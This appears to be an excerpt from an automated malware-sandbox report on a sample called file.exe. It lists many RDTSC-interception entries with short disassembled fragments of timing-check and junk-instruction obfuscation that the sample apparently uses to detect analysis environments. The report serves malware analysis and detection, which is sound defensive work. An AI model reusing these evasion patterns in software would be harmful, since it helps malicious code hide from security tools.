Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3B40 second address: 2C3B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3C26 second address: 2C3C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2478h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F625CDF2477h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3ED8 second address: 2C3EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3FE3 second address: 2C3FE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C3FE8 second address: 2C4004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CED05C0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C4004 second address: 2C400A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C43A6 second address: 2C43DD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+122D1C17h], ebx 0x00000014 push 0000001Eh 0x00000016 mov edi, 0C019443h 0x0000001b nop 0x0000001c push ebx 0x0000001d pushad 0x0000001e ja 00007F625CED05B6h 0x00000024 jnp 00007F625CED05B6h 0x0000002a popad 0x0000002b pop ebx 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 push edi 0x00000032 pop edi 0x00000033 popad 0x00000034 push ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C4673 second address: 2C46AC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F625CDF247Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, edi 0x0000000f lea eax, dword ptr [ebp+124881B8h] 0x00000015 jmp 00007F625CDF246Ah 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C46AC second address: 2A4A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F625CED05B8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a or edi, 64663127h 0x00000030 lea eax, dword ptr [ebp+12488174h] 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F625CED05B8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 jmp 00007F625CED05C9h 0x00000055 push eax 0x00000056 jp 00007F625CED05C0h 0x0000005c mov dword ptr [esp], eax 0x0000005f mov dword ptr [ebp+124764ECh], edi 0x00000065 call dword ptr [ebp+1245125Fh] 0x0000006b pushad 0x0000006c jmp 00007F625CED05BBh 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F0DD1 second address: 2F0DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F10C7 second address: 2F10CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F10CB second address: 2F10ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF246Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F625CDF246Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F10ED second address: 2F111B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BCh 0x00000007 jl 00007F625CED05B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F625CED05C8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F111B second address: 2F1136 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F625CDF246Dh 0x00000008 jbe 00007F625CDF2466h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1272 second address: 2F127D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F625CED05B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F13AD second address: 2F13EB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F625CDF2479h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F625CDF2478h 0x00000012 jbe 00007F625CDF2466h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1561 second address: 2F1567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F71EA second address: 2F71F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F71F2 second address: 2F7201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jnl 00007F625CED05BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7201 second address: 2F721B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F625CDF2472h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F721B second address: 2F722E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F625CED05B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F722E second address: 2F7234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7234 second address: 2F723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F723F second address: 2F7243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7243 second address: 2F7264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7264 second address: 2F7268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7268 second address: 2F726C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F726C second address: 2F7272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7272 second address: 2F728C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F625CED05BCh 0x0000000c jc 00007F625CED05B6h 0x00000012 je 00007F625CED05BCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F73A5 second address: 2F73B9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F625CDF2466h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F625CDF246Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F73B9 second address: 2F73EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 js 00007F625CED05B6h 0x0000000b pop edx 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f jmp 00007F625CED05BAh 0x00000014 jmp 00007F625CED05C4h 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7520 second address: 2F7545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F625CDF2473h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7545 second address: 2F754B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F754B second address: 2F754F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7812 second address: 2F7852 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F625CED05B6h 0x0000000b pop edx 0x0000000c jmp 00007F625CED05C9h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jg 00007F625CED05CEh 0x00000019 push ecx 0x0000001a jno 00007F625CED05B6h 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 pushad 0x00000024 jbe 00007F625CED05B6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F7974 second address: 2F7978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2FDECC second address: 2FDF17 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F625CED05C2h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push ebx 0x00000013 jmp 00007F625CED05C2h 0x00000018 jns 00007F625CED05B6h 0x0000001e pop ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 pop eax 0x00000022 push edx 0x00000023 pop edx 0x00000024 je 00007F625CED05B6h 0x0000002a push eax 0x0000002b pop eax 0x0000002c popad 0x0000002d pushad 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 300D99 second address: 300D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 300915 second address: 300951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F625CED05C4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F625CED05C2h 0x00000019 jbe 00007F625CED05B6h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 300951 second address: 300970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F625CDF2479h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 300970 second address: 300974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3052BA second address: 3052CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304A8F second address: 304A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F625CED05B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304A9B second address: 304AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F625CDF2466h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304AAA second address: 304AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CED05C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304AC2 second address: 304AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304C9D second address: 304CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F625CED05C1h 0x0000000a jbe 00007F625CED05B6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jc 00007F625CED05B6h 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304CCA second address: 304CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304CCE second address: 304CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304CD2 second address: 304CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304E1C second address: 304E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 304E22 second address: 304E32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F625CDF2478h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30B817 second address: 30B822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F625CED05B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C41AF second address: 2C41B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C41B4 second address: 2C4238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F625CED05B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F625CED05C3h 0x00000014 nop 0x00000015 mov edi, dword ptr [ebp+122D29D2h] 0x0000001b add dword ptr [ebp+12476E89h], ecx 0x00000021 mov ebx, dword ptr [ebp+124881B3h] 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F625CED05B8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 add eax, ebx 0x00000043 jmp 00007F625CED05BBh 0x00000048 mov cx, FFA6h 0x0000004c nop 0x0000004d js 00007F625CED05BEh 0x00000053 jns 00007F625CED05B8h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jbe 00007F625CED05B8h 0x00000062 push esi 0x00000063 pop esi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C4238 second address: 2C425E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add edi, dword ptr [ebp+122D1BF5h] 0x00000010 push 00000004h 0x00000012 mov cx, 3CA5h 0x00000016 nop 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2C425E second address: 2C4262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30AA88 second address: 30AA92 instructions: 0x00000000 rdtsc 0x00000002 je 00007F625CDF2466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30E64D second address: 30E651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DFD1 second address: 30DFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DFD7 second address: 30DFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F625CED05C4h 0x0000000c jno 00007F625CED05B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DFF8 second address: 30DFFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30DFFE second address: 30E004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30E004 second address: 30E016 instructions: 0x00000000 rdtsc 0x00000002 js 00007F625CDF246Ch 0x00000008 ja 00007F625CDF2466h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30E016 second address: 30E01A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31194C second address: 311951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 311951 second address: 31195D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F625CED05B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 311A6A second address: 311AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F625CDF2479h 0x0000000a jmp 00007F625CDF2476h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 311BAF second address: 311BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319502 second address: 31953E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF246Dh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007F625CDF246Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F625CDF2478h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31953E second address: 319544 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3197D3 second address: 3197E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF246Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3197E9 second address: 3197FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F625CED05BDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3197FF second address: 31982D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F625CDF2479h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F625CDF246Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31982D second address: 31983F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F625CED05B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31983F second address: 319843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319DB7 second address: 319DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CED05BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319DCA second address: 319DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A601 second address: 31A60C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F625CED05B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A923 second address: 31A93D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F625CDF2466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jg 00007F625CDF2466h 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A93D second address: 31A942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31AC6B second address: 31AC70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31AFC2 second address: 31AFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31ED20 second address: 31ED26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31ED26 second address: 31ED3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F625CED05BBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31EE68 second address: 31EE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31EE6C second address: 31EE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
